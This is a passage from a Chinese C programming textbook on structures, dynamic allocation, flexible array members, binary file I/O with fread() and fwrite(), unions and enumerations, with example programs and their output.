%s, your name contains %d letters.\n", info.fname, info.lname, info.letters); 1048 } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 处理输入行的剩余部分 } return ret_val; } 该版本最终的输出和前面版本相同,但是它使用了不同的方式。程序中 的每个函数都创建了自己的person备份,所以该程序使用了4个不同的结 构,不像前面的版本只使用一个结构。 1049 例如,考虑makeinfo()函数。在第1个程序中,传递的是person的地址, 该函数实际上处理的是person的值。在第2个版本的程序中,创建了一个新 的结构info。储存在person中的值被拷贝到info中,函数处理的是这个副本。 因此,统计完字母个数后,计算结果储存在info中,而不是person中。然 而,返回机制弥补了这一点。makeinfo()中的这行代码: return info; 与main()中的这行结合: person = makeinfo(person); 把储存在info中的值拷贝到person中。注意,必须把makeinfo()函数声明 为struct namect类型,所以该函数要返回一个结构。 14.7.5 结构和结构指针的选择 假设要编写一个与结构相关的函数,是用结构指针作为参数,还是用结 构作为参数和返回值?两者各有优缺点。 把指针作为参数有两个优点:无论是以前还是现在的C实现都能使用这 种方法,而且执行起来很快,只需要传递一个地址。缺点是无法保护数据。 被调函数中的某些操作可能会意外影响原来结构中的数据。不过,ANSI C 新增的const限定符解决了这个问题。例如,如果在程序清单14.8中, showinfo()函数中的代码改变了结构的任意成员,编译器会捕获这个错误。 把结构作为参数传递的优点是,函数处理的是原始数据的副本,这保护 了原始数据。另外,代码风格也更清楚。假设定义了下面的结构类型: struct vector {double x; double y;}; 如果用vector类型的结构ans储存相同类型结构a和b的和,就要把结构作 为参数和返回值: 1050 struct vector ans, a, b; struct vector sum_vect(struct vector, struct vector); ... ans = sum_vect(a,b); 对程序员而言,上面的版本比用指针传递的版本更自然。指针版本如 下: struct vector ans, a, b; void sum_vect(const struct vector *, const struct vector *, struct vector *); ... 
sum_vect(&a, &b, &ans); 另外,如果使用指针版本,程序员必须记住总和的地址应该是第1个参 数还是第2个参数的地址。 传递结构的两个缺点是:较老版本的实现可能无法处理这样的代码,而 且传递结构浪费时间和存储空间。尤其是把大型结构传递给函数,而它只使 用结构中的一两个成员时特别浪费。这种情况下传递指针或只传递函数所需 的成员更合理。 通常,程序员为了追求效率会使用结构指针作为函数参数,如需防止原 始数据被意外修改,使用const限定符。按值传递结构是处理小型结构最常 用的方法。 14.7.6 结构中的字符数组和字符指针 到目前为止,我们在结构中都使用字符数组来储存字符串。是否可以使 用指向 char 的指针来代替字符数组?例如,程序清单14.3中有如下声明: 1051 #define LEN 20 struct names { char first[LEN]; char last[LEN]; }; 其中的结构声明是否可以这样写: struct pnames { char * first; char * last; }; 当然可以,但是如果不理解这样做的含义,可能会有麻烦。考虑下面的 代码: struct names veep = {"Talia", "Summers"}; struct pnames treas = {"Brad", "Fallingjaw"}; printf("%s and %s\n", veep.first, treas.first); 以上代码都没问题,也能正常运行,但是思考一下字符串被储存在何 处。对于struct names类型的结构变量veep,以上字符串都储存在结构内部, 结构总共要分配40字节储存姓名。然而,对于struct pnames类型的结构变量 treas,以上字符串储存在编译器储存常量的地方。结构本身只储存了两个地 址,在我们的系统中共占16字节。尤其是,struct pnames结构不用为字符串 分配任何存储空间。它使用的是储存在别处的字符串(如,字符串常量或数 组中的字符串)。简而言之,在pnames结构变量中的指针应该只用来在程序 1052 中管理那些已分配和在别处分配的字符串。 我们看看这种限制在什么情况下出问题。考虑下面的代码: struct names accountant; struct pnames attorney; puts("Enter the last name of your accountant:"); scanf("%s", accountant.last); puts("Enter the last name of your attorney:"); scanf("%s", attorney.last);  /* 这里有一个潜在的危险 */ 就语法而言,这段代码没问题。但是,用户的输入储存到哪里去了?对 于会计师(accountant),他的名储存在accountant结构变量的last成员中,该 结构中有一个储存字符串的数组。对于律师(attorney),scanf()把字符串放 到attorney.last表示的地址上。由于这是未经初始化的变量,地址可以是任何 值,因此程序可以把名放在任何地方。如果走运的话,程序不会出问题,至 少暂时不会出问题,否则这一操作会导致程序崩溃。实际上,如果程序能正 常运行并不是好事,因为这意味着一个未被觉察的危险潜伏在程序中。 因此,如果要用结构储存字符串,用字符数组作为成员比较简单。用指 向 char 的指针也行,但是误用会导致严重的问题。 14.7.7 结构、指针和malloc() 如果使用malloc()分配内存并使用指针储存该地址,那么在结构中使用 指针处理字符串就比较合理。这种方法的优点是,可以请求malloc()为字符 串分配合适的存储空间。可以要求用4字节储存"Joe"和用18字节储 存"Rasolofomasoandro"。用这种方法改写程序清单14.9并不费劲。主要是更 改结构声明(用指针代替数组)和提供一个新版本的getinfo()函数。新的结 1053 构声明如下: struct namect { char * fname; // 用指针代替数组 char * lname; int letters; }; 新版本的getinfo()把用户的输入读入临时数组中,调用malloc()函数分配 存储空间,并把字符串拷贝到新分配的存储空间中。对名和姓都要这样做: void getinfo (struct namect * pst) { char temp[SLEN]; printf("Please enter your first name.\n"); s_gets(temp, SLEN); // 分配内存储存名 pst->fname = (char *) malloc(strlen(temp) + 1); // 把名拷贝到已分配的内存 strcpy(pst->fname, temp); printf("Please enter your last name.\n"); s_gets(temp, SLEN); 1054 pst->lname = (char *) malloc(strlen(temp) + 1); strcpy(pst->lname, temp); } 要理解这两个字符串都未储存在结构中,它们储存在 malloc()分配的内 存块中。然而,结构中储存着这两个字符串的地址,处理字符串的函数通常 都要使用字符串的地址。因此,不用修改程序中的其他函数。 第12章建议,应该成对使用malloc()和free()。因此,还要在程序中添加 一个新的函数cleanup(),用于释放程序动态分配的内存。如程序清单14.10所 示。 程序清单14.10 names3.c程序 // names3.c -- 使用指针和 malloc() #include <stdio.h> #include <string.h>  // 提供 strcpy()、strlen() 的原型 #include <stdlib.h>  // 提供 malloc()、free() 的原型 #define SLEN 81 struct namect { char * fname; // 使用指针 char * lname; int letters; }; 1055 void getinfo(struct namect *);   // 分配内存 void makeinfo(struct namect *); void showinfo(const struct namect *); void cleanup(struct namect *);   // 调用该函数时释放内存 char * s_gets(char * st, int n); int main(void) { struct namect person; getinfo(&person); makeinfo(&person); showinfo(&person); cleanup(&person); return 0; } void getinfo(struct namect * pst) { char temp[SLEN]; printf("Please enter your first name.\n"); s_gets(temp, SLEN); 1056 // 分配内存以储存名 pst->fname = (char *) malloc(strlen(temp) + 1); // 把名拷贝到动态分配的内存中 strcpy(pst->fname, temp); printf("Please enter your last name.\n"); s_gets(temp, SLEN); pst->lname = (char *) malloc(strlen(temp) + 1); strcpy(pst->lname, temp); } void makeinfo(struct namect * pst) { pst->letters = strlen(pst->fname) + strlen(pst->lname); } void showinfo(const struct namect * pst) { printf("%s %s, your name contains %d letters.\n", 
pst->fname, pst->lname, pst->letters); } 1057 void cleanup(struct namect * pst) { free(pst->fname); free(pst->lname); } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)          // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 else while (getchar() != '\n') continue;     // 处理输入行的剩余部分 } 1058 return ret_val; } 下面是该程序的输出: Please enter your first name. Floresiensis Please enter your last name. Mann Floresiensis Mann, your name contains 16 letters. 14.7.8 复合字面量和结构(C99) C99 的复合字面量特性可用于结构和数组。如果只需要一个临时结构 值,复合字面量很好用。例如,可以使用复合字面量创建一个数组作为函数 的参数或赋给另一个结构。语法是把类型名放在圆括号中,后面紧跟一个用 花括号括起来的初始化列表。例如,下面是struct book类型的复合字面量: (struct book) {"The Idiot", "Fyodor Dostoyevsky", 6.99} 程序清单14.11中的程序示例,使用复合字面量为一个结构变量提供两 个可替换的值(在撰写本书时,并不是所有的编译器都支持这个特性,不过 这是时间的问题)。 程序清单14.11 complit.c程序 /* complit.c -- 复合字面量 */ #include <stdio.h> #define MAXTITL 41 1059 #define MAXAUTL 31 struct book {     // 结构模版:标记是 book char title[MAXTITL]; char author[MAXAUTL]; float value; }; int main(void) { struct book readfirst; int score; printf("Enter test score: "); scanf("%d", &score); if (score >= 84) readfirst = (struct book) {"Crime and Punishment", "Fyodor Dostoyevsky", 11.25}; else readfirst = (struct book) {"Mr.Bouncy's Nice Hat", "Fred Winsome", 1060 5.99}; printf("Your assigned reading:\n"); printf("%s by %s: $%.2f\n", readfirst.title, readfirst.author, readfirst.value); return 0; } 还可以把复合字面量作为函数的参数。如果函数接受一个结构,可以把 复合字面量作为实际参数传递: struct rect {double x; double y;}; double rect_area(struct rect r){return r.x * r.y;} ... double area; area = rect_area( (struct rect) {10.5, 20.0}); 值210被赋给area。 如果函数接受一个地址,可以传递复合字面量的地址: struct rect {double x; double y;}; double rect_areap(struct rect * rp){return rp->x * rp->y;} ... 
double area; 1061 area = rect_areap( &(struct rect) {10.5, 20.0}); 值210被赋给area。 复合字面量在所有函数的外部,具有静态存储期;如果复合字面量在块 中,则具有自动存储期。复合字面量和普通初始化列表的语法规则相同。这 意味着,可以在复合字面量中使用指定初始化器。 14.7.9 伸缩型数组成员(C99) C99新增了一个特性:伸缩型数组成员(flexible array member),利用 这项特性声明的结构,其最后一个数组成员具有一些特性。第1个特性是, 该数组不会立即存在。第2个特性是,使用这个伸缩型数组成员可以编写合 适的代码,就好像它确实存在并具有所需数目的元素一样。这可能听起来很 奇怪,所以我们来一步步地创建和使用一个带伸缩型数组成员的结构。 首先,声明一个伸缩型数组成员有如下规则: 伸缩型数组成员必须是结构的最后一个成员; 结构中必须至少有一个成员; 伸缩数组的声明类似于普通数组,只是它的方括号中是空的。 下面用一个示例来解释以上几点: struct flex { int count; double average; double scores[]; // 伸缩型数组成员 1062 }; 声明一个struct flex类型的结构变量时,不能用scores做任何事,因为没 有给这个数组预留存储空间。实际上,C99的意图并不是让你声明struct flex 类型的变量,而是希望你声明一个指向struct flex类型的指针,然后用 malloc()来分配足够的空间,以储存struct flex类型结构的常规内容和伸缩型 数组成员所需的额外空间。例如,假设用scores表示一个内含5个double类型 值的数组,可以这样做: struct flex * pf; // 声明一个指针 // 请求为一个结构和一个数组分配存储空间 pf = malloc(sizeof(struct flex) + 5 * sizeof(double)); 现在有足够的存储空间储存count、average和一个内含5个double类型值 的数组。可以用指针pf访问这些成员: pf->count = 5;     // 设置 count 成员 pf->scores[2] = 18.5; // 访问数组成员的一个元素 程序清单14.13进一步扩展了这个例子,让伸缩型数组成员在第1种情况 下表示5个值,在第2种情况下代表9个值。该程序也演示了如何编写一个函 数处理带伸缩型数组元素的结构。 程序清单14.12 flexmemb.c程序 // flexmemb.c -- 伸缩型数组成员(C99新增特性) #include <stdio.h> #include <stdlib.h> struct flex 1063 { size_t count; double average; double scores []; // 伸缩型数组成员 }; void showFlex(const struct flex * p); int main(void) { struct flex * pf1, *pf2; int n = 5; int i; int tot = 0; // 为结构和数组分配存储空间 pf1 = malloc(sizeof(struct flex) + n * sizeof(double)); pf1->count = n; for (i = 0; i < n; i++) { pf1->scores[i] = 20.0 - i; tot += pf1->scores[i]; 1064 } pf1->average = tot / n; showFlex(pf1); n = 9; tot = 0; pf2 = malloc(sizeof(struct flex) + n * sizeof(double)); pf2->count = n; for (i = 0; i < n; i++) { pf2->scores[i] = 20.0 - i / 2.0; tot += pf2->scores[i]; } pf2->average = tot / n; showFlex(pf2); free(pf1); free(pf2); return 0; } void showFlex(const struct flex * p) 1065 { int i; printf("Scores : "); for (i = 0; i < p->count; i++) printf("%g ", p->scores[i]); printf("\nAverage: %g\n", p->average); } 下面是该程序的输出: Scores : 20 19 18 17 16 Average: 18 Scores : 20 19.5 19 18.5 18 17.5 17 16.5 16 Average: 17 带伸缩型数组成员的结构确实有一些特殊的处理要求。第一,不能用结 构进行赋值或拷贝: struct flex * pf1, *pf2;  // *pf1 和*pf2 都是结构 ... 
*pf2 = *pf1;       // 不要这样做 这样做只能拷贝除伸缩型数组成员以外的其他成员。确实要进行拷贝, 应使用memcpy()函数(第16章中介绍)。 第二,不要以按值方式把这种结构传递给结构。原因相同,按值传递一 1066 个参数与赋值类似。要把结构的地址传递给函数。 第三,不要使用带伸缩型数组成员的结构作为数组成员或另一个结构的 成员。 这种类似于在结构中最后一个成员是伸缩型数组的情况,称为struct hack。除了伸缩型数组成员在声明时用空的方括号外,struct hack特指大小为 0的数组。然而,struct hack是针对特殊编译器(GCC)的,不属于C标准。 这种伸缩型数组成员方法是标准认可的编程技巧。 14.7.10 匿名结构(C11) 匿名结构是一个没有名称的结构成员。为了理解它的工作原理,我们先 考虑如何创建嵌套结构: struct names { char first[20]; char last[20]; }; struct person { int id; struct names name;// 嵌套结构成员 }; struct person ted = {8483, {"Ted", "Grass"}}; 1067 这里,name成员是一个嵌套结构,可以通过类似ted.name.first的表达式 访问"ted": puts(ted.name.first); 在C11中,可以用嵌套的匿名成员结构定义person: struct person { int id; struct {char first[20]; char last[20];}; // 匿名结构 }; 初始化ted的方式相同: struct person ted = {8483, {"Ted", "Grass"}}; 但是,在访问ted时简化了步骤,只需把first看作是person的成员那样使 用它: puts(ted.first); 当然,也可以把first和last直接作为person的成员,删除嵌套循环。匿名 特性在嵌套联合中更加有用,我们在本章后面介绍。 14.7.11 使用结构数组的函数 假设一个函数要处理一个结构数组。由于数组名就是该数组的地址,所 以可以把它传递给函数。另外,该函数还需访问结构模板。为了理解该函数 的工作原理,程序清单14.13把前面的金融程序扩展为两人,所以需要一个 内含两个funds结构的数组。 1068 程序清单14.13 funds4.c程序 /* funds4.c -- 把结构数组传递给函数 */ #include <stdio.h> #define FUNDLEN 50 #define N 2 struct funds { char   bank[FUNDLEN]; double  bankfund; char save[FUNDLEN]; double  savefund; }; double sum(const struct funds money [], int n); int main(void) { struct funds jones[N] = { { "Garlic-Melon Bank", 4032.27, "Lucky's Savings and Loan", 1069 8543.94 }, { "Honest Jack's Bank", 3620.88, "Party Time Savings", 3802.91 } }; printf("The Joneses have a total of $%.2f.\n",sum(jones, N)); return 0; } double sum(const struct funds money [], int n) { double total; int i; for (i = 0, total = 0; i < n; i++) total += money[i].bankfund + money[i].savefund; return(total); 1070 } 该程序的输出如下: The Joneses have a total of $20000.00. (读者也许认为这个总和有些巧合!) 
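在分析这个程序之前,先补充一个简短的示意(非原书程序清单):由于函数接收的是结构数组的地址,如果去掉 const 限定符,被调函数对各结构成员的修改会直接作用于原数组。下面的 add_interest() 函数和简化的 funds 结构(只保留两个 double 成员)都是为演示而假设的:
/* interest.c -- 示意:通过数组地址直接修改结构数组的内容 */
#include <stdio.h>
#define N 2
struct funds {
    double bankfund;
    double savefund;
};
void add_interest(struct funds money[], int n, double rate);
int main(void)
{
    struct funds jones[N] = { { 4032.27, 8543.94 }, { 3620.88, 3802.91 } };
    add_interest(jones, N, 0.05);      /* 传递的是数组地址 */
    printf("After interest: $%.2f\n",
        jones[0].bankfund + jones[0].savefund);  /* 原数组已被修改 */
    return 0;
}
void add_interest(struct funds money[], int n, double rate)
{
    int i;
    for (i = 0; i < n; i++)
    {
        money[i].bankfund *= 1.0 + rate;  /* 直接作用于原结构 */
        money[i].savefund *= 1.0 + rate;
    }
}
下面来分析程序清单14.13本身。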
数组名jones是该数组的地址,即该数组首元素(jones[0])的地址。因 此,指针money的初始值相当于通过下面的表达式获得: money = &jones[0]; 因为money指向jones数组的首元素,所以money[0]是该数组的另一个名 称。与此类似,money[1]是第2个元素。每个元素都是一个funds类型的结 构,所以都可以使用点运算符(.)来访问funds类型结构的成员。 下面是几个要点。 可以把数组名作为数组中第1个结构的地址传递给函数。 然后可以用数组表示法访问数组中的其他结构。注意下面的函数调用与 使用数组名效果相同: sum(&jones[0], N) 因为jones和&jones[0]的地址相同,使用数组名是传递结构地址的一种 间接的方法。 由于sum()函数不能改变原始数据,所以该函数使用了ANSI C的限定符 const。 1071 14.8 把结构内容保存到文件中 由于结构可以储存不同类型的信息,所以它是构建数据库的重要工具。 例如,可以用一个结构储存雇员或汽车零件的相关信息。最终,我们要把这 些信息储存在文件中,并且能再次检索。数据库文件可以包含任意数量的此 类数据对象。储存在一个结构中的整套信息被称为记录(record),单独的 项被称为字段(field)。本节我们来探讨这个主题。 或许储存记录最没效率的方法是用fprintf()。例如,回忆程序清单14.1中 的book结构: #define MAXTITL 40 #define MAXAUTL 40 struct book { char title[MAXTITL]; char author[MAXAUTL]; float value; }; 如果pbook标识一个文件流,那么通过下面这条语句可以把信息储存在 struct book类型的结构变量primer中: fprintf(pbooks, "%s %s %.2f\n", primer.title,primer.author, primer.value); 对于一些结构(如,有 30 个成员的结构),这个方法用起来很不方 便。另外,在检索时还存在问题,因为程序要知道一个字段结束和另一个字 段开始的位置。虽然用固定字段宽度的格式可以解决这个问题(例 如,"%39s%39s%8.2f"),但是这个方法仍然很笨拙。 1072 更好的方案是使用fread()和fwrite()函数读写结构大小的单元。回忆一 下,这两个函数使用与程序相同的二进制表示法。例如: fwrite(&primer, sizeof(struct book), 1, pbooks); 定位到 primer 结构变量开始的位置,并把结构中所有的字节都拷贝到 与 pbooks 相关的文件中。sizeof(struct book)告诉函数待拷贝的一块数据的大 小,1 表明一次拷贝一块数据。带相同参数的fread()函数从文件中拷贝一块 结构大小的数据到&primer指向的位置。简而言之,这两个函数一次读写整 个记录,而不是一个字段。 以二进制表示法储存数据的缺点是,不同的系统可能使用不同的二进制 表示法,所以数据文件可能不具可移植性。甚至同一个系统,不同编译器设 置也可能导致不同的二进制布局。 14.8.1 保存结构的程序示例 为了演示如何在程序中使用这些函数,我们把程序清单14.2修改为一个 新的版本(即程序清单14.14),把书名保存在book.dat文件中。如果该文件 已存在,程序将显示它当前的内容,然后允许在文件中添加内容(如果你使 用的是早期的Borland编译器,请参阅程序清单14.2后面的“Borland C和浮点 数”)。 程序清单14.14 booksave.c程序 /* booksave.c -- 在文件中保存结构中的内容 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define MAXTITL 40 1073 #define MAXAUTL 40 #define MAXBKS 10     /* 最大书籍数量 */ char * s_gets(char * st, int n); struct book {       /* 建立 book 模板 */ char title[MAXTITL]; char author[MAXAUTL]; float value; }; int main(void) { struct book library[MAXBKS]; /* 结构数组 */ int count = 0; int index, filecount; FILE * pbooks; int size = sizeof(struct book); if ((pbooks = fopen("book.dat", "a+b")) == NULL) { fputs("Can't open book.dat file\n", stderr); exit(1); 1074 } rewind(pbooks);      /* 定位到文件开始 */ while (count < MAXBKS && fread(&library[count], size, 1, pbooks) == 1) { if (count == 0) puts("Current contents of book.dat:"); printf("%s by %s: $%.2f\n", library[count].title, library[count].author, library[count].value); count++; } filecount = count; if (count == MAXBKS) { fputs("The book.dat file is full.", stderr); exit(2); } puts("Please add new book titles."); puts("Press [enter] at the start of a line to stop."); 1075 while (count < MAXBKS && s_gets(library[count].title, MAXTITL) != NULL && library[count].title[0] != '\0') { puts("Now enter the author."); s_gets(library[count].author, MAXAUTL); puts("Now enter the value."); scanf("%f", &library[count++].value); while (getchar() != '\n') continue;     /* 清理输入行 */ if (count < MAXBKS) puts("Enter the next title."); } if (count > 0) { puts("Here is the list of your books:"); for (index = 0; index < count; index++) printf("%s by %s: $%.2f\n", library[index].title, library[index].author, library[index].value); 1076 fwrite(&library[filecount], size, count - filecount, pbooks); } else puts("No books? 
Too bad.\n"); puts("Bye.\n"); fclose(pbooks); return 0; } char * s_gets(char * st, int n) { char * ret_val; char * find; ret_val = fgets(st, n, stdin); if (ret_val) { find = strchr(st, '\n');  // 查找换行符 if (find)       // 如果地址不是 NULL, *find = '\0';     // 在此处放置一个空字符 1077 else while (getchar() != '\n') continue;   // 清理输入行 } return ret_val; } 我们先看几个运行示例,然后再讨论程序中的要点。 $ booksave Please add new book titles. Press [enter] at the start of a line to stop. Metric Merriment Now enter the author. Polly Poetica Now enter the value. 18.99 Enter the next title. Deadly Farce Now enter the author. Dudley Forse 1078 Now enter the value. 15.99 Enter the next title. [enter] Here is the list of your books: Metric Merriment by Polly Poetica: $18.99 Deadly Farce by Dudley Forse: $15.99 Bye. $ booksave Current contents of book.dat: Metric Merriment by Polly Poetica: $18.99 Deadly Farce by Dudley Forse: $15.99 Please add new book titles. The Third Jar Now enter the author. Nellie Nostrum Now enter the value. 22.99 Enter the next title. 1079 [enter] Here is the list of your books: Metric Merriment by Polly Poetica: $18.99 Deadly Farce by Dudley Forse: $15.99 The Third Jar by Nellie Nostrum: $22.99 Bye. $ 再次运行booksave.c程序把这3本书作为当前的文件记录打印出来。 14.8.2 程序要点 首先,以"a+b"模式打开文件。a+部分允许程序读取整个文件并在文件 的末尾添加内容。b 是 ANSI的一种标识方法,表明程序将使用二进制文件 格式。对于不接受b模式的UNIX系统,可以省略b,因为UNIX只有一种文件 形式。对于早期的ANSI实现,要找出和b等价的表示法。 我们选择二进制模式是因为fread()和fwrite()函数要使用二进制文件。虽 然结构中有些内容是文本,但是value成员不是文本。如果使用文本编辑器 查看book.dat,该结构本文部分的内容显示正常,但是数值部分的内容不可 读,甚至会导致文本编辑器出现乱码。 rewrite()函数确保文件指针位于文件开始处,为读文件做好准备。 第1个while循环每次把一个结构读到结构数组中,当数组已满或读完文 件时停止。变量filecount统计已读结构的数量。 第2个while按下循环提示用户进行输入,并接受用户的输入。和程序清 单14.2一样,当数组已满或用户在一行的开始处按下Enter键时,循环结束。 1080 注意,该循环开始时count变量的值是第1个循环结束后的值。该循环把新输 入项添加到数组的末尾。 然后for循环打印文件和用户输入的数据。因为该文件是以附加模式打 开,所以新写入的内容添加到文件现有内容的末尾。 我们本可以用一个循环在文件末尾一次添加一个结构,但还是决定用 fwrite()一次写入一块数据。对表达式count - filecount求值得新添加的书籍数 量,然后调用fwrite()把结构大小的块写入文件。由于表达式 &library[filecount]是数组中第1个新结构的地址,所以拷贝就从这里开始。 也许该例是把结构写入文件和检索它们的最简单的方法,但是这种方法 浪费存储空间,因为这还保存了结构中未使用的部分。该结构的大小是 2×40×sizeof(char)+sizeof(float),在我们的系统中共84字节。实际上不是每个 输入项都需要这么多空间。但是,让每个输入块的大小相同在检索数据时很 方便。 另一个方法是使用可变大小的记录。为了方便读取文件中的这种记录, 每个记录以数值字段规定记录的大小。这比上一种方法复杂。通常,这种方 法涉及接下来要介绍的“链式结构”和第16章的动态内存分配。 1081 14.9 链式结构 在结束讨论结构之前,我们想简要介绍一下结构的多种用途之一:创建 新的数据形式。计算机用户已经开发出的一些数据形式比我们提到过的数组 和简单结构更有效地解决特定的问题。这些形式包括队列、二叉树、堆、哈 希表和图表。许多这样的形式都由链式结构(linked structure)组成。通 常,每个结构都包含一两个数据项和一两个指向其他同类型结构的指针。这 些指针把一个结构和另一个结构链接起来,并提供一种路径能遍历整个彼此 链接的结构。例如,图14.3演示了一个二叉树结构,每个单独的结构(或节 点)都和它下面的两个结构(或节点)相连。 图14.3 一个二叉树结构 图14.3中显示的分级或树状的结构是否比数组高效?考虑一个有10级节 点的树的情况。它有210−1(或1023)个节点,可以储存1023个单词。如果 这些单词以某种规则排列,那么可以从最顶层开始,逐级向下移动查找单 词,最多只需移动9次便可找到任意单词。如果把这些单词都放在一个数组 中,最多要查找1023个元素才能找出所需的单词。 如果你对这些高级概念感兴趣,可以阅读一些关于数据结构的书籍。使 用C结构,可以创建和使用那些书中介绍的各种数据形式。另外,第17章中 也介绍了一些高级数据形式。 本章对结构的概念介绍至此为止,第17章中会给出链式结构的例子。下 1082 面,我们介绍C语言中的联合、枚举和typedef。 1083 14.10 联合简介 联合(union)是一种数据类型,它能在同一个内存空间中储存不同的 数据类型(不是同时储存)。其典型的用法是,设计一种表以储存既无规 律、事先也不知道顺序的混合类型。使用联合类型的数组,其中的联合都大 小相等,每个联合可以储存各种数据类型。 创建联合和创建结构的方式相同,需要一个联合模板和联合变量。可以 用一个步骤定义联合,也可以用联合标记分两步定义。下面是一个带标记的 联合模板: union hold { int digit; double bigfl; char letter; }; 根据以上形式声明的结构可以储存一个int类型、一个double类型和char 类型的值。然而,声明的联合只能储存一个int类型的值或一个double类型的 值或char类型的值。 下面定义了3个与hold类型相关的变量: union hold fit;    // hold类型的联合变量 union hold save[10];  // 内含10个联合变量的数组 union hold * pu;   // 指向hold类型联合变量的指针 第1个声明创建了一个单独的联合变量fit。编译器分配足够的空间以便 它能储存联合声明中占用最大字节的类型。在本例中,占用空间最大的是 1084 double类型的数据。在我们的系统中,double类型占64位,即8字节。第2个 声明创建了一个数组save,内含10个元素,每个元素都是8字节。第3个声明 创建了一个指针,该指针变量储存hold类型联合变量的地址。 可以初始化联合。需要注意的是,联合只能储存一个值,这与结构不 同。有 3 种初始化的方法:把一个联合初始化为另一个同类型的联合;初始 
化联合的第1个元素;或者根据C99标准,使用指定初始化器: union hold valA; valA.letter = 'R'; union hold valB = valA;       // 用另一个联合来初始化 union hold valC = {88};       // 初始化联合的digit 成员 union hold valD = {.bigfl = 118.2}; // 指定初始化器 14.10.1 使用联合 下面是联合的一些用法: fit.digit = 23; //把 23 储存在 fit,占2字节 fit.bigfl = 2.0; // 清除23,储存 2.0,占8字节 fit.letter = 'h'; // 清除2.0,储存h,占1字节 点运算符表示正在使用哪种数据类型。在联合中,一次只储存一个值。 即使有足够的空间,也不能同时储存一个char类型值和一个int类型值。编写 代码时要注意当前储存在联合中的数据类型。 和用指针访问结构使用->运算符一样,用指针访问联合时也要使用->运 算符: pu = &fit; 1085 x = pu->digit; // 相当于 x = fit.digit 不要像下面的语句序列这样: fit.letter = 'A'; flnum = 3.02*fit.bigfl; // 错误 以上语句序列是错误的,因为储存在 fit 中的是 char 类型,但是下一行 却假定 fit 中的内容是double类型。 不过,用一个成员把值储存在一个联合中,然后用另一个成员查看内 容,这种做法有时很有用。下一章的程序清单15.4就给出了一个这样的例 子。 联合的另一种用法是,在结构中储存与其成员有从属关系的信息。例 如,假设用一个结构表示一辆汽车。如果汽车属于驾驶者,就要用一个结构 成员来描述这个所有者。如果汽车被租赁,那么需要一个成员来描述其租赁 公司。可以用下面的代码来完成: struct owner { char socsecurity[12]; ... }; struct leasecompany { char name[40]; char headquarters[40]; ... 1086 }; union data { struct owner owncar; struct leasecompany leasecar; }; struct car_data { char make[15]; int status; /* 私有为0,租赁为1 */ union data ownerinfo; ... }; 假设flits是car_data类型的结构变量,如果flits.status为0,程序将使用 flits.ownerinfo.owncar.socsecurity,如果flits.status为1,程序则使用 flits.ownerinfo.leasecar.name。 14.10.2 匿名联合(C11) 匿名联合和匿名结构的工作原理相同,即匿名联合是一个结构或联合的 无名联合成员。例如,我们重新定义car_data结构如下: struct owner { char socsecurity[12]; ... 1087 }; struct leasecompany { char name[40]; char headquarters[40]; ... }; struct car_data { char make[15]; int status; /* 私有为0,租赁为1 */ union { struct owner owncar; struct leasecompany leasecar; }; . }; 现在,如果 flits 是 car_data 类型的结构变量,可以用 flits.owncar.socsecurity 代替flits.ownerinfo.owncar.socsecurity。 总结:结构和联合运算符 成员运算符:. 1088 一般注释: 该运算符与结构或联合名一起使用,指定结构或联合的一个成员。如果 name是一个结构的名称, member是该结构模版指定的一个成员名,下面标 识了该结构的这个成员: name.member name.member的类型就是member的类型。联合使用成员运算符的方式与 结构相同。 示例: struct { int code; float cost; } item; item.code = 1265; 间接成员运算符:-> 一般注释: 该运算符和指向结构或联合的指针一起使用,标识结构或联合的一个成 员。假设ptrstr是指向结构的指针,member是该结构模版指定的一个成员, 那么: ptrstr->member 标识了指向结构的成员。联合使用间接成员运算符的方式与结构相同。 示例: 1089 struct { int code; float cost; } item, * ptrst; ptrst = &item; ptrst->code = 3451; 最后一条语句把一个int类型的值赋给item的code成员。如下3个表达式 是等价的: ptrst->code   item.code    (*ptrst).code 1090 14.11 枚举类型 可以用枚举类型(enumerated type)声明符号名称来表示整型常量。使 用enum关键字,可以创建一个新“类型”并指定它可具有的值(实际上,enum 常量是int类型,因此,只要能使用int类型的地方就可以使用枚举类型)。枚 举类型的目的是提高程序的可读性。它的语法与结构的语法相同。例如,可 以这样声明: enum spectrum {red, orange, yellow, green, blue, violet}; enum spectrum color; 第1个声明创建了spetrum作为标记名,允许把enum spetrum作为一个类型 名使用。第2个声明使color作为该类型的变量。第1个声明中花括号内的标 识符枚举了spectrum变量可能有的值。因此, color 可能的值是 red、 orange、yellow 等。这些符号常量被称为枚举符(enumerator)。然后,便 可这样用: int c; color = blue; if (color == yellow) ...; for (color = red; color <= violet; color++) ...; 虽然枚举符(如red和blue)是int类型,但是枚举变量可以是任意整数类 型,前提是该整数类型可以储存枚举常量。例如,spectrum的枚举符范围是 0~5,所以编译器可以用unsigned char来表示color变量。 1091 顺带一提,C枚举的一些特性并不适用于C++。例如,C允许枚举变量 使用++运算符,但是C++标准不允许。所以,如果编写的代码将来会并入 C++程序,那么必须把上面例子中的color声明为int类型,才能C和C++都兼 容。 14.11.1 enum常量 blue和red到底是什么?从技术层面看,它们是int类型的常量。例如,假 定有前面的枚举声明,可以这样写: printf("red = %d, orange = %d\n", red, orange); 其输出如下: red = 0, orange = 1 red成为一个有名称的常量,代表整数0。类似地,其他标识符都是有名 称的常量,分别代表1~5。只要是能使用整型常量的地方就可以使用枚举常 量。例如,在声明数组时,可以用枚举常量表示数组的大小;在switch语句 中,可以把枚举常量作为标签。 14.11.2 默认值 默认情况下,枚举列表中的常量都被赋予0、1、2等。因此,下面的声 明中nina的值是3: enum kids {nippy, slats, skippy, nina, liz}; 14.11.3 赋值 在枚举声明中,可以为枚举常量指定整数值: enum levels {low = 100, medium = 500, high = 2000}; 如果只给一个枚举常量赋值,没有对后面的枚举常量赋值,那么后面的 1092 常量会被赋予后续的值。例如,假设有如下的声明: enum feline {cat, lynx = 10, puma, tiger}; 
